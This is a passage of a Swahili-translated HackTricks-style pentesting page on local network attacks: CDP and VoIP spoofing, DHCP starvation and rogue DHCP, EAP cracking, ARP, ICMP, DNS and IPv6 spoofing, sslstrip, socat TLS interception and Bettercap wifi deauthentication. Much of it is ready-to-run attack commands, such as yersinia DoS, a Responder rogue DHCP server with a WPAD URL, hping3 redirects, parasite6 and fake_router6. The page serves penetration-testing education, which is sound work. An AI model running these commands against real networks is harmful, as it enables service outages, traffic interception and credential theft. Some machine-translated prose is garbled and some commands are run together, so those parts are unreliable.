Njia yenye msukumo zaidi inahusisha kuzindua shambulio la Kukataa Huduma (DoS) kwa kuzidi kumbukumbu ya swichi, kujifanya kuwa vifaa halali vya CISCO. Hapa chini ni mfuatano wa amri za kuanzisha shambulio kama hilo kwa kutumia Yersinia, zana ya mtandao iliyoundwa kwa ajili ya majaribio:

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

Wakati wa shambulio hili, CPU ya swichi na jedwali la majirani wa CDP wanachukua mzigo mkubwa, hii inasababisha kinachoitwa mara nyingi "kuzorota kwa mtandao" kutokana na matumizi mabaya ya rasilimali.

Shambulio la Udanganyifu wa CDP

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

Unaweza pia kutumia scapy. Hakikisha kuweka kwa kutumia pakiti ya scapy/contrib.

Mashambulizi ya VoIP na Zana ya VoIP Hopper

Simu za VoIP, zinazidi kuunganishwa na vifaa vya IoT, zinatoa huduma kama kufungua milango au kudhibiti mitambo ya kupasha joto kupitia namba maalum za simu. Hata hivyo, muunganisho huu unaweza kuleta hatari za usalama.

Zana ya voiphopper imeundwa ili kuiga simu ya VoIP katika mazingira mbalimbali (Cisco, Avaya, Nortel, Alcatel-Lucent). Inagundua kitambulisho cha VLAN ya mtandao wa sauti kwa kutumia itifaki kama CDP, DHCP, LLDP-MED, na 802.1Q ARP.

VoIP Hopper inatoa njia tatu za itifaki ya Ugunduzi wa Cisco (CDP):

1. Njia ya Kuchunguza (-c 0): Inachambua pakiti za mtandao ili kutambua kitambulisho cha VLAN.
2. Njia ya Udanganyifu (-c 1): Inazalisha pakiti za kawaida zinazofanana na zile za kifaa halisi cha VoIP.
3. Njia ya Udanganyifu na Pakiti Zilizotengenezwa Mapema (-c 2): Inatuma pakiti zinazofanana na zile za mfano maalum wa simu ya IP ya Cisco.

Njia inayopendelewa kwa kasi ni ile ya tatu. Inahitaji kutoa maelezo yafuatayo:

• Kiolesura cha mtandao cha mshambuliaji (-i parameter).
• Jina la kifaa cha VoIP kinachoigwa (-E parameter), kwa kufuata muundo wa jina la Cisco (k.m., SEP ikifuatiwa na anwani ya MAC).

Katika mazingira ya kampuni, ili kuiga kifaa cha VoIP kilichopo, mtu anaweza:

• Kuchunguza lebo ya MAC kwenye simu.
• Navigeisha mipangilio ya kuonyesha ya simu ili kuona habari ya mfano.
• Unganisha kifaa cha VoIP kwenye kompyuta na uangalie maombi ya CDP kwa kutumia Wireshark.

Amri ya mfano ya kutekeleza zana katika njia ya tatu ingekuwa:

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

Introduction

DHCP (Dynamic Host Configuration Protocol) is a network protocol used to automatically assign IP addresses and other network configuration parameters to devices on a network. DHCP attacks involve exploiting vulnerabilities in the DHCP protocol to gain unauthorized access or disrupt network operations.

Enumeration Techniques

Enumeration is the process of gathering information about the DHCP server and its configuration. This information can be used to identify potential vulnerabilities and plan further attacks. The following techniques can be used for DHCP enumeration:

1. DHCP Discover: This technique involves sending a DHCP Discover message to the network, requesting an IP address lease. By analyzing the responses from the DHCP server, you can gather information such as the server's IP address, subnet mask, default gateway, and DNS server.

2. DHCP Lease Query: This technique involves querying the DHCP server for information about active leases. By analyzing the lease information, you can identify active devices on the network and gather information such as their IP addresses, MAC addresses, and lease expiration times.

3. DHCP Starvation: This technique involves flooding the DHCP server with a large number of DHCP Discover messages, exhausting the available IP address pool. This can lead to denial of service (DoS) conditions, preventing legitimate devices from obtaining IP addresses.

4. DHCP Rogue Server: This technique involves setting up a rogue DHCP server on the network. The rogue server responds to DHCP requests from devices, providing them with malicious configuration parameters. This can lead to man-in-the-middle (MitM) attacks, where the rogue server intercepts network traffic and eavesdrops on sensitive information.

Countermeasures

To protect against DHCP attacks, the following countermeasures can be implemented:

1. DHCP Snooping: DHCP snooping is a security feature that can be enabled on network switches. It allows the switch to inspect DHCP messages and verify their legitimacy. Suspicious DHCP messages can be dropped or logged for further analysis.

2. Port Security: Port security can be enabled on network switches to restrict the number of MAC addresses allowed on a port. This prevents rogue devices from connecting to the network and obtaining IP addresses through DHCP.

3. DHCP Rate Limiting: DHCP rate limiting can be implemented to limit the number of DHCP messages that can be processed by the DHCP server within a certain time frame. This helps prevent DHCP starvation attacks by limiting the rate at which IP addresses are assigned.

4. Network Segmentation: By segmenting the network into smaller subnets, the impact of DHCP attacks can be limited. Each subnet can have its own DHCP server, reducing the attack surface and preventing the spread of malicious DHCP configuration parameters.

Conclusion

Enumeration of DHCP servers is an important step in the pentesting process. By gathering information about the DHCP server and its configuration, potential vulnerabilities can be identified and appropriate countermeasures can be implemented to protect against DHCP attacks.

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

DoS

Kuna aina mbili za DoS zinazoweza kutekelezwa dhidi ya seva za DHCP. Ya kwanza inahusisha kuiga vya kutosha vifaa bandia ili kutumia anwani zote za IP zinazowezekana. Shambulio hili litafanya kazi tu ikiwa unaweza kuona majibu ya seva ya DHCP na kukamilisha itifaki (Kugundua (Comp) -> Kutoa (seva) -> Ombi (Comp) -> ACK (seva)). Kwa mfano, hii haiwezekani katika mitandao ya Wifi.

Njia nyingine ya kutekeleza DoS ya DHCP ni kwa kutuma pakiti ya DHCP-RELEASE ukitumia kila anwani ya IP inayowezekana kama chanzo. Kisha, seva itadhani kuwa kila mtu amemaliza kutumia anwani ya IP.

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

Njia ya kiotomatiki zaidi ya kufanya hivi ni kutumia zana DHCPing

Unaweza kutumia mashambulizi ya DoS yaliyotajwa hapo juu ili kulazimisha wateja kupata mikataba mpya ndani ya mazingira, na kuchosha seva halali ili zisijibu. Kwa hivyo, wakati seva halali zinajaribu kuungana tena, unaweza kutoa thamani mbaya zilizotajwa katika shambulio lifuatalo.

Weka thamani mbaya

Seva ya DHCP bandia inaweza kuwekwa kwa kutumia skripti ya DHCP iliyo katika /usr/share/responder/DHCP.py. Hii ni muhimu kwa mashambulizi ya mtandao, kama kukamata trafiki na vitambulisho vya HTTP, kwa kuelekeza trafiki kwenye seva mbaya. Walakini, kuweka lango bandia ni chini ya ufanisi kwani inaruhusu tu kukamata trafiki ya kutoka kwa mteja, ikikosa majibu kutoka kwa lango halisi. Badala yake, kuweka seva bandia ya DNS au WPAD inapendekezwa kwa shambulio lenye ufanisi zaidi.

Hapa chini ni chaguo za amri za kusanidi seva bandia ya DHCP:

• Anwani yetu ya IP (Matangazo ya Lango): Tumia -i 10.0.0.100 kuonyesha anwani ya IP ya kompyuta yako kama lango.
• Jina la Kikoa cha DNS cha Lokal: Kwa hiari, tumia -d example.org kuweka jina la kikoa cha DNS cha lokal.
• IP ya Router/Gateway Halisi: Tumia -r 10.0.0.1 kuweka anwani ya IP ya router au lango halali.
• IP ya Seva Kuu ya DNS: Tumia -p 10.0.0.100 kuweka anwani ya IP ya seva bandia ya DNS unayodhibiti.
• IP ya Seva ya DNS ya Pili: Kwa hiari, tumia -s 10.0.0.1 kuweka anwani ya IP ya seva ya DNS ya pili.
• Netmask ya Mtandao wa Lokal: Tumia -n 255.255.255.0 kuweka netmask ya mtandao wa lokal.
• Kiolesura cha Trafiki ya DHCP: Tumia -I eth1 kusikiliza trafiki ya DHCP kwenye kiolesura cha mtandao maalum.
• Anwani ya Usanidi wa WPAD: Tumia -w "http://10.0.0.100/wpad.dat" kuweka anwani ya usanidi wa WPAD, ikisaidia kukamata trafiki ya wavuti.
• Bandia IP ya Lango la Chaguo-msingi: Ongeza -S ili kudanganya anwani ya IP ya lango la chaguo-msingi.
• Jibu Maombi Yote ya DHCP: Ongeza -R ili kufanya seva isijibu maombi yote ya DHCP, lakini kumbuka kuwa hii inasababisha kelele na inaweza kugunduliwa.

Kwa kutumia chaguo hizi kwa usahihi, seva bandia ya DHCP inaweza kuwekwa ili kukamata trafiki ya mtandao kwa ufanisi.

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

Mashambulizi ya EAP

Hapa kuna baadhi ya mbinu za mashambulizi zinazoweza kutumika dhidi ya utekelezaji wa 802.1X:

• Kuvunja nguvu ya nywila kwa kutumia EAP
• Kushambulia seva ya RADIUS na maudhui yaliyoharibika ya EAP **(exploits)
• Kukamata ujumbe wa EAP na kuvunja nguvu ya nywila nje ya mtandao (EAP-MD5 na PEAP)
• Kulazimisha uwakilishi wa EAP-MD5 ili kuepuka uthibitisho wa cheti cha TLS
• Kuingiza trafiki mbaya ya mtandao baada ya kuthibitisha kwa kutumia kifaa cha kati au kama hicho

Ikiwa mshambuliaji yupo kati ya mwathirika na seva ya uthibitisho, anaweza kujaribu kudhoofisha (ikiwa ni lazima) itifaki ya uthibitisho hadi EAP-MD5 na kukamata jaribio la uthibitisho. Kisha, anaweza kuvunja nguvu ya nywila hii kwa kutumia:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

Mashambulizi ya FHRP (GLBP & HSRP)

FHRP (Itifaki ya Kwanza ya Redundancy ya Hop) ni darasa la itifaki za mtandao zilizoundwa kwa ajili ya kuunda mfumo wa usambazaji wa njia mbadala. Kwa kutumia FHRP, rutuba za kimwili zinaweza kuunganishwa kuwa kifaa kimoja mantiki, ambacho huongeza uwezo wa kuhimili hitilafu na kusaidia kusambaza mzigo.

Wahandisi wa Cisco Systems wameendeleza itifaki mbili za FHRP, GLBP na HSRP.

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Kuna toleo tatu za Itifaki ya Taarifa ya Usambazaji (RIP) inayojulikana: RIP, RIPv2, na RIPng. Datagramu hutumwa kwa wenzake kupitia bandari 520 kwa kutumia UDP na RIP na RIPv2, wakati datagramu hutangazwa kwa bandari ya UDP 521 kupitia IPv6 multicast na RIPng. Msaada wa uthibitishaji wa MD5 uliingizwa na RIPv2. Kwa upande mwingine, uthibitishaji wa asili haujumuishwi na RIPng; badala yake, tegemezi linawekwa kwenye vichwa vya IPsec AH na ESP ndani ya IPv6.

• RIP na RIPv2: Mawasiliano yanafanywa kupitia datagramu za UDP kwenye bandari 520.
• RIPng: Inatumia bandari ya UDP 521 kwa kutangaza datagramu kupitia IPv6 multicast.

Tafadhali kumbuka kuwa RIPv2 inasaidia uthibitishaji wa MD5 wakati RIPng hauna uthibitishaji wa asili, tegemezi linawekwa kwenye vichwa vya IPsec AH na ESP ndani ya IPv6.

Mashambulizi ya EIGRP

EIGRP (Itifaki ya Kuongeza Usambazaji wa Lango la Ndani) ni itifaki ya usambazaji ya kiotomatiki. Ni itifaki ya vector ya umbali. Ikiwa hakuna uthibitishaji na usanidi wa interface za kupitisha, muingiliaji anaweza kuingilia kati na usambazaji wa EIGRP na kusababisha sumu ya meza za usambazaji. Zaidi ya hayo, mtandao wa EIGRP (yaani, mfumo wa kiotomatiki) ni gorofa na hauna kugawanywa katika eneo lolote. Ikiwa mshambuliaji anaingiza njia, kuna uwezekano kwamba njia hii itaenea katika mfumo wa EIGRP wa kiotomatiki.

Kushambulia mfumo wa EIGRP kunahitaji kuweka jirani na router halali wa EIGRP, ambayo inafungua fursa nyingi, kutoka kwa uchunguzi wa msingi hadi sindano mbalimbali.

FRRouting inaruhusu kutekeleza router ya kubuni ambayo inasaidia BGP, OSPF, EIGRP, RIP na itifaki nyingine. Unachohitaji kufanya ni kuweka kwenye mfumo wa mshambuliaji wako na unaweza kujifanya kuwa router halali katika kikoa cha usambazaji.

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

Coly ina uwezo wa kuvamia matangazo ya EIGRP (Itifaki ya Kuongeza Usambazaji wa Lango la Ndani). Pia inaruhusu sindano ya pakiti, ambayo inaweza kutumika kubadilisha usanidi wa usambazaji.

OSPF

Katika itifaki ya Open Shortest Path First (OSPF) uthibitishaji wa MD5 mara nyingi hutumiwa kuhakikisha mawasiliano salama kati ya rutuba. Walakini, hatua hii ya usalama inaweza kudhoofishwa kwa kutumia zana kama Loki na John the Ripper. Zana hizi zina uwezo wa kukamata na kuvunja fungu la MD5, kufichua ufunguo wa uthibitishaji. Mara ufunguo huu unapopatikana, unaweza kutumika kuingiza habari mpya ya usambazaji. Kwa kusanidi vigezo vya njia na kuanzisha ufunguo uliodhoofishwa, tabo za Injection na Connection hutumiwa, mtawalia.

• Kukamata na Kuvunja Fungu la MD5: Zana kama Loki na John the Ripper hutumiwa kwa kusudi hili.
• Kusanidi Vigezo vya Njia: Hii inafanywa kupitia kichupo cha Injection.
• Kuweka Ufunguo Uliodhoofishwa: Ufunguo unawekwa chini ya kichupo cha Connection.

Zana na Vyanzo Vingine vya Kawaida

• Above: Zana ya kutambaza trafiki ya mtandao na kupata udhaifu
• Unaweza kupata mashambulizi zaidi ya mtandao hapa.

Spoofing

Mshambuliaji anasanidi vigezo vyote vya mtandao (GW, IP, DNS) ya mwanachama mpya wa mtandao kwa kutuma majibu ya DHCP bandia.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Angalia sehemu iliyopita.

ICMPRedirect

ICMP Redirect inajumuisha kutuma pakiti ya ICMP aina 1 nambari 5 ambayo inaonyesha kuwa mshambuliaji ndiye njia bora ya kufikia anwani ya IP. Kisha, wakati waathiriwa wanataka kuwasiliana na anwani ya IP, watatuma pakiti kupitia mshambuliaji.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Mshambuliaji atahalalisha baadhi (au zote) za kikoa ambazo muathiriwa anauliza.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Sanidi DNS yako mwenyewe na dnsmasq

Dnsmasq ni programu-jalizi ya DNS ambayo inaweza kutumiwa kusanidi na kusimamia seva yako ya DNS. Inatoa huduma ya kusimamia majina ya kikoa na anwani za IP kwenye mtandao wako.

Kwa kusanidi DNS yako mwenyewe na dnsmasq, unaweza kudhibiti jinsi majina ya kikoa yanavyolinganishwa na anwani za IP kwenye mtandao wako. Hii inaweza kuwa muhimu katika kesi za uchunguzi wa usalama au kwa kusimamia trafiki ya mtandao.

Ili kusanidi DNS yako mwenyewe na dnsmasq, unahitaji kufuata hatua zifuatazo:

1. Pakua na Sakinisha Dnsmasq: Anza kwa kupakua na kusakinisha programu-jalizi ya dnsmasq kwenye mfumo wako. Unaweza kutumia amri kama apt-get au yum kulingana na mfumo wako wa uendeshaji.

2. Sanidi Faili ya Konfigurisheni: Baada ya kusakinisha dnsmasq, unahitaji kusanidi faili ya konfigurisheni ili kuweka mipangilio yako ya DNS. Faili hii inaweza kuwa /etc/dnsmasq.conf au njia nyingine kulingana na usanidi wako. Fungua faili hii kwa kutumia mhariri wa maandishi na uweke mipangilio yako ya DNS.

3. Anzisha na Sakinisha Dnsmasq: Baada ya kusanidi faili ya konfigurisheni, unaweza kuanzisha na kusakinisha dnsmasq kwa kutumia amri kama systemctl start dnsmasq au service dnsmasq start. Hii itawezesha seva yako ya DNS na kuanza kutumika kulingana na mipangilio yako.

4. Thibitisha Uendeshaji: Hatimaye, unahitaji kuthibitisha kuwa DNS yako imefanikiwa kusanidiwa na inafanya kazi vizuri. Unaweza kufanya hivyo kwa kutumia amri kama nslookup au dig ili kuchunguza majina ya kikoa na anwani za IP zinazolingana.

Kwa kufuata hatua hizi, utaweza kusanidi DNS yako mwenyewe na dnsmasq na kudhibiti jinsi majina ya kikoa yanavyolinganishwa na anwani za IP kwenye mtandao wako. Hii itakuruhusu kufanya uchunguzi wa usalama na kusimamia trafiki ya mtandao kwa ufanisi zaidi.

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Malango ya Ndani

Maranyingi kuna njia nyingi za kufikia mifumo na mitandao. Baada ya kuunda orodha ya anwani za MAC ndani ya mtandao wa ndani, tumia gateway-finder.py kutambua watumiaji wanaounga mkono kuhamisha IPv4.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Kudanganya LLMNR, NBT-NS, na mDNS

Kwa ufumbuzi wa ndani wa mwenyeji wakati utafutaji wa DNS haufanikiwi, mifumo ya Microsoft hutegemea Link-Local Multicast Name Resolution (LLMNR) na NetBIOS Name Service (NBT-NS). Vivyo hivyo, Apple Bonjour na Linux zero-configuration hutumia Multicast DNS (mDNS) kugundua mifumo ndani ya mtandao. Kutokana na asili ya kutokuwa na uthibitisho wa itifaki hizi na uendeshaji wao kupitia UDP, kutuma ujumbe kwa njia ya utangazaji, wanaweza kutumiwa na wadukuzi wanaolenga kupelekeza watumiaji kwenye huduma za hatari.

Unaweza kujifanya kuwa huduma ambazo zinatafutwa na mwenyeji kwa kutumia Responder kutuma majibu bandia.
Soma hapa habari zaidi kuhusu jinsi ya kujifanya kuwa huduma na Responder.

Kudanganya WPAD

Vivinjari mara nyingi hutumia Web Proxy Auto-Discovery (WPAD) protocol kupata moja kwa moja mipangilio ya proksi. Hii inahusisha kupata maelezo ya usanidi kutoka kwenye seva, hasa kupitia URL kama vile "http://wpad.example.org/wpad.dat". Ugunduzi wa seva hii na wateja unaweza kufanyika kupitia njia mbalimbali:

• Kupitia DHCP, ambapo ugunduzi unawezeshwa kwa kutumia kuingiza nambari maalum ya 252.
• Kupitia DNS, ambayo inahusisha kutafuta jina la mwenyeji lililolabeliwa wpad ndani ya kikoa cha ndani.
• Kupitia Microsoft LLMNR na NBT-NS, ambazo ni njia za akiba zinazotumiwa katika hali ambapo utafutaji wa DNS haufanikiwi.

Zana ya Responder inatumia itifaki hii kwa kujifanya kuwa seva mbaya ya WPAD. Inatumia DHCP, DNS, LLMNR, na NBT-NS kuwadanganya wateja kuunganishwa nayo. Ili kuchunguza zaidi jinsi huduma zinavyoweza kujifanya kwa kutumia Responder angalia hapa.

Kudanganya vifaa vya SSDP na UPnP

Unaweza kutoa huduma tofauti kwenye mtandao ili kudanganya mtumiaji kuingiza vitambulisho vya maandishi wazi. Taarifa zaidi kuhusu shambulio hili katika Kudanganya vifaa vya SSDP na UPnP.

Kudanganya Jirani wa IPv6

Shambulio hili ni sawa na Kudanganya ARP lakini katika ulimwengu wa IPv6. Unaweza kumfanya muathirika aamini kuwa IPv6 ya GW ina MAC ya mshambuliaji.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

Kudanganya/Kufurika Kwa Matangazo ya Mtoaji wa Mtoaji wa IPv6

Baadhi ya mfumo wa uendeshaji huanzisha kwa chaguo-msingi lango kutoka kwa pakiti za RA zinazotumwa kwenye mtandao. Ili kutangaza mshambuliaji kama mtoaji wa mtoaji wa IPv6, unaweza kutumia:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

Kudanganya DHCP ya IPv6

Kwa chaguo-msingi, baadhi ya mfumo wa uendeshaji hujaribu kusanidi DNS kwa kusoma pakiti ya DHCPv6 kwenye mtandao. Kwa hiyo, mshambuliaji anaweza kutuma pakiti ya DHCPv6 ili kujisajili kama DNS. DHCP pia hutoa anwani ya IPv6 kwa muathirika.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (ukurasa bandia na uingizaji wa msimbo wa JS)

Mashambulizi ya Mtandao

sslStrip

Kimsingi, shambulio hili linachofanya ni, katika kesi ambapo mtumiaji anajaribu kufikia ukurasa wa HTTP ambao unaelekeza kwenye toleo la HTTPS. sslStrip itaendeleza unganisho la HTTP na mteja na unganisho la HTTPS na seva ili iweze kuchunguza uhusiano huo kwa maandishi wazi.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Maelezo zaidi hapa.

sslStrip+ na dns2proxy kwa kuepuka HSTS

Tofauti kati ya sslStrip+ na dns2proxy dhidi ya sslStrip ni kwamba wataelekeza kwa mfano www.facebook.com kwenda wwww.facebook.com (kumbuka w ya ziada) na watatuma anwani ya kikoa hiki kama anwani ya mshambuliaji. Kwa njia hii, mteja atakuwa anahusiana na wwww.facebook.com (mshambuliaji) lakini nyuma ya pazia sslstrip+ itaendelea kuhifadhi uhusiano halisi kupitia https na www.facebook.com.

Lengo la mbinu hii ni kuepuka HSTS kwa sababu wwww.facebook.com haitahifadhiwa katika hifadhidata ya kivinjari, hivyo kivinjari kitadanganywa kufanya uthibitisho wa facebook kwa njia ya HTTP.
Tambua kwamba ili kutekeleza shambulio hili, mwathirika lazima ajaribu kwanza kupata http://www.faceook.com na sio https. Hii inaweza kufanywa kwa kubadilisha viungo ndani ya ukurasa wa http.

Maelezo zaidi hapa, hapa na hapa.

sslStrip au sslStrip+ haifanyi kazi tena. Hii ni kwa sababu kuna sheria za HSTS zilizohifadhiwa awali katika vivinjari, hivyo hata kama ni mara ya kwanza mtumiaji anapata kikoa "muhimu" atapata kupitia HTTPS. Pia, tafadhali kumbuka kuwa sheria zilizohifadhiwa awali na sheria zingine zilizozalishwa zinaweza kutumia bendera includeSubdomains kwa hivyo mfano wa wwww.facebook.com uliotajwa hapo awali hautafanya kazi tena kwa sababu facebook.com inatumia HSTS na includeSubdomains.

TODO: easy-creds, evilgrade, metasploit, factory

Kusikiliza TCP kwenye bandari

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

Sikiliza TCP + SSL kwenye bandari

Jenga funguo na cheti cha kujisaini

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Sikiliza kwa kutumia cheti

Kusikiliza kwa kutumia cheti ni mbinu ya kusikiliza mawasiliano kwenye mtandao kwa kutumia cheti. Mbinu hii inatumika hasa kwenye mawasiliano salama yanayotumia itifaki kama HTTPS.

Kwa kutekeleza mbinu hii, hacker anahitaji kupata cheti cha kuaminika ambacho kinaweza kutumika kusikiliza mawasiliano. Kuna njia kadhaa za kupata cheti hiki, kama vile kudukua mamlaka ya cheti (CA) au kudukua seva ya cheti.

Baada ya kupata cheti, hacker anaweza kusikiliza mawasiliano kwa kufanya mabadiliko kwenye mtandao. Kwa mfano, wanaweza kuanzisha seva ya kati (man-in-the-middle) ili kusikiliza na kurekodi mawasiliano yote yanayopita kati ya seva na watumiaji.

Mbinu hii inaweza kuwa hatari sana, kwani inaruhusu hacker kupata habari nyeti kama vile manenosiri na data ya kibinafsi. Ni muhimu kwa wamiliki wa mtandao kuchukua hatua za kuzuia mbinu hii kwa kuhakikisha usalama wa cheti na kufuatilia mawasiliano yasiyo ya kawaida kwenye mtandao.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Sikiliza kwa kutumia cheti na uelekeze kwa wenyeji

Kuna njia mbalimbali za kusikiliza mawasiliano kwenye mtandao. Moja ya njia hizo ni kusikiliza mawasiliano kwa kutumia cheti na kisha kuyaelekeza kwa wenyeji wengine.

Kwa kufanya hivyo, unaweza kuchukua cheti cha mtumiaji au cheti cha seva na kisha kuitumia kusikiliza mawasiliano yaliyofanywa kwenye mtandao. Baada ya kusikiliza mawasiliano hayo, unaweza kuyaelekeza kwa wenyeji wengine ili kuendelea kusikiliza na kuchambua mawasiliano hayo.

Njia hii inaweza kuwa na manufaa katika kufanya uchunguzi wa usalama au kuchunguza shughuli zisizo halali kwenye mtandao. Hata hivyo, ni muhimu kuzingatia kuwa kusikiliza mawasiliano kwa kutumia cheti na kuyaelekeza kwa wenyeji wengine ni kinyume cha sheria katika mazingira mengi, isipokuwa kama una idhini rasmi au unafanya hivyo kwa madhumuni ya kujifunza na kuboresha usalama wa mtandao.

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Kuna nyakati ambapo, ikiwa mteja anathibitisha kuwa CA ni halali, unaweza kutumikia cheti cha jina la mwenyeji mwingine kilichosainiwa na CA.
Jaribio lingine la kuvutia ni kutumikia cheti cha jina la mwenyeji ulioulizwa lakini kilichojisaini.

Vitu vingine vya kujaribu ni kujaribu kusaini cheti na cheti halali ambacho sio CA halali. Au kutumia funguo za umma halali, kulazimisha kutumia algorithm kama diffie hellman (ambayo haihitaji kufungua kitu chochote na funguo halisi za siri) na wakati mteja anapoomba kisanduku cha funguo cha siri halisi (kama hash), tuma kisanduku cha uchunguzi bandia na tarajia kuwa mteja hatafanya ukaguzi huu.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Taarifa za Ugunduzi wa Kazi

Chukua kuzingatia kwamba wakati pakiti ya UDP inatumwa kwa kifaa ambacho hakina bandari inayohitajika, ICMP (Port Unreachable) inatumwa.

Ugunduzi wa ARP

Pakiti za ARP hutumiwa kugundua ni IP zipi zinatumika ndani ya mtandao. Kompyuta lazima itume ombi kwa kila anwani ya IP inayowezekana na zile tu zinazotumiwa zitajibu.

mDNS (multicast DNS)

Bettercap hutuma ombi la MDNS (kila X ms) likiuliza kwa _services_.dns-sd._udp.local kifaa ambacho kinaona pakiti hii kawaida hujibu ombi hili. Kisha, inatafuta tu kifaa kinachojibu "huduma".

Zana

• Avahi-browser (--all)
• Bettercap (net.probe.mdns)
• Responder

NBNS (NetBios Name Server)

Bettercap hutangaza pakiti kwa bandari 137/UDP likiuliza jina "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap hutangaza pakiti za SSDP likitafuta aina zote za huduma (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap hutangaza pakiti za WSD likitafuta huduma (UDP Port 3702).

Marejeo

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9
• Network Security Assessment: Know Your Network (3rd edition)
• Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood
• https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Mshauri wa tuzo ya mdudu: Jisajili kwa Intigriti, jukwaa la tuzo ya mdudu ya malipo ya juu iliyoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ina tangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi wa PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
